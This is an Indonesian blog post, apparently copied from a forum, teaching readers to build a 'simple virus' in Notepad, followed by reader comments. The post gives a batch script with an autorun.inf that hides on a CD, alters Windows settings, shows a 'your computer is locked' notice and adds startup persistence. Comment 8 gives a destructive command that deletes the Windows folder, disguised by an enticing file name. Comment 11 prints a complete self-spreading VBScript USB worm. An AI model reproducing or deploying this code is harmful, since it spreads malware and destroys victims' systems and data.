Cara Buat Virus Sederhana Dari Notepad


ni virus efeknya g t’lalu bahaya….efek dari virus ini cuman mengganti tampilan dari
windows…..tapi cukup bikin kaget juga!!! tapi yg penting gak ke-detect ama anti virus(setahu saya….. )

ni ane dapet dari hasil baca-baca “HELP”-nya windows Xp…trus ane modif sendiri…

note: “HANYA BEKERJA PADA WINDOWS XP”

caranya:
– buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
– buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat

- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
– file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
– copy file-file tsb ke CD
– nikmati efeknya

note:
– jangan disalahgunakan
– maaf kalau pernah diposting
– maaf lagi kalau salah tempat untuk posting,….maklum member baru and masih amatir ….
– lagi-lagi maaf kalau ada yang salah, and mohon dikoreksi ….
– kalau mau buat anti virusnya tinggal di modifikasi nilainya….

Sumber : http://www.yogyafree.net/forum2/viewtopic.php?t=11281

About these ads

85 thoughts on “Cara Buat Virus Sederhana Dari Notepad

  1. ali

    bangg gw lg seneng komputr nih pingin tau bikin virus,gw baca di atas trus gw g ngerti maksudny file yg dbuat dengan flash trus di publish maksudnya gmana y bangg…oon bngt nih gw….please…kasih tau dunk caranya gmana…..sebelumnya masih y…
    kasih tau y bangg

  2. gossen

    Gimana trik-trik belajar bhs pemrograman???
    karena aku agak kesusahan belajarnya…..
    mhon pencerahannya…..

  3. Nurlan

    tolong dong script mencari drive otomatis pake notepad tapi ga perlu pake vb cukup lewat file BAT. tolong yach…..
    gua baru mobelajar….

  4. dani

    mas, kalo bikin antinya gimana????
    trus kalo virusnya dah jadi….da efeknya gak ke kmputer kita???

  5. masato

    eh mas,, sory lupa.
    punya virus yang bisa nyerang virus ndak???
    kalo ada tolong kirim ke emailQ ya, please aQ lagi butuh ntuk di copy.

  6. Ibrahim

    Mantep bener tuh tips nya!!! Patut buat di cobain. Tapi ngomong2 ada ngga’ cara laen yang lebih mudah di mengerti, soalnya aku bukan orang yang pinter2 amat…………!!!

  7. assaas

    coy.. kirim aku kode virusnya..
    tp jg ma cara menghentikannya..
    aq jd penasaran nii.. tp cm tambah ilmu azaaaa….

  8. Killer HaCkeR

    Kalau mau ngebantai komputer ni source code nya:
    tulis di notepad
    del C:/Windows
    Save dengan nama
    Pembantai.cmd
    .cmd harus ditulis kalau nama files terserah aja, mungkin agar lebih memikat utk di klik tulis dengan kata-kata/icon yang sedang naik daun seperti gitu lah.

    Efeknya, begitu org yang mengklik files cmd itu di kompinya, kompinya akan langsung tidak jalan!Karena Windowsnya terhapus. Maka dia harus menginstall windowsnya lagi dan bila semua data diletakkan di C dan desktop pasti hilang.

    Resep saya belum tentu berhasil ,jadi kalau tidak berhasil jangan putus asa ya!

  9. pino

    bang pach thu makchutnya
    pino kurang ngerti thu
    .
    please bang ajaren pino…
    pino bener2 gak thau banget nick…
    pino pengen banget blajar…
    .
    pino haraf bantuanya

  10. LIGHTfromHEAVEN

    Oalah Agoes agoes…

    Eh,ad yg isa Bikin VIRUS CINTA nggak???

    Yg bisa buat merangsang wanitanya…

    ad nggak????

  11. camp

    kawan kawan buka notepad kalian salin scrib di bawah ini simpan dengan nama erwinda_putra.exe.vbs
    AWAS…!!!!
    virus ini sangat berbahaya…
    apapun yang terjadi bukan tanggungan saya…
    SALAM MESRA BUAT HACKER PADANG YE…
    SALAMAT PENGHANCURKAN..
    =====================================================
    ‘El Magnifico MAN
    on error resume next
    dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
    atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”
    set fs = createobject(“Scripting.FileSystemObject”)
    set mf = fs.getfile(Wscript.ScriptFullname)
    dim text,size
    size = mf.size
    check = mf.drive.drivetype
    set text=mf.openastextstream(1,-2)
    do while not text.atendofstream
    mysource=mysource&text.readline
    mysource=mysource & vbcrlf
    loop
    do
    Set winpath = fs.getspecialfolder(0)
    set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
    tf.attributes = 32
    set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true)
    tf.write mysource
    tf.close
    set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
    tf.attributes = 39
    for each flashdrive in fs.drives
    If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
    set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
    tf.attributes =32
    set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true)
    tf.write mysource
    tf.close
    set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
    tf.attributes =39
    set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
    tf.attributes = 32
    set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
    tf.write atr
    tf.close
    set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
    tf.attributes=39
    end if
    next
    set rg = createobject(“WScript.Shell”)
    rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs”
    rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””
    rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
    if check 1 then
    Wscript.sleep 100000
    end if
    loop while check1
    set sd = createobject(“Wscript.shell”)
    sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

    do while year(now) >= 2008
    WScript.sleep 20000

    msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _
    “ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _
    “dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _
    “iko permainan yang paten ma dunsanak” & vbcrlf & _
    vbcrlf & vbcrlf & _
    ” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _
    ” aaa kini saaiknyo ma dunsanak”

    loop

  12. ainul_mf

    gw sih cukup tertarik dengan scrib tersebut, untuk itu gw mau minta izin tuk ngembangin scrib tu agar jadi yang agak berbahaya .

Komentar ditutup.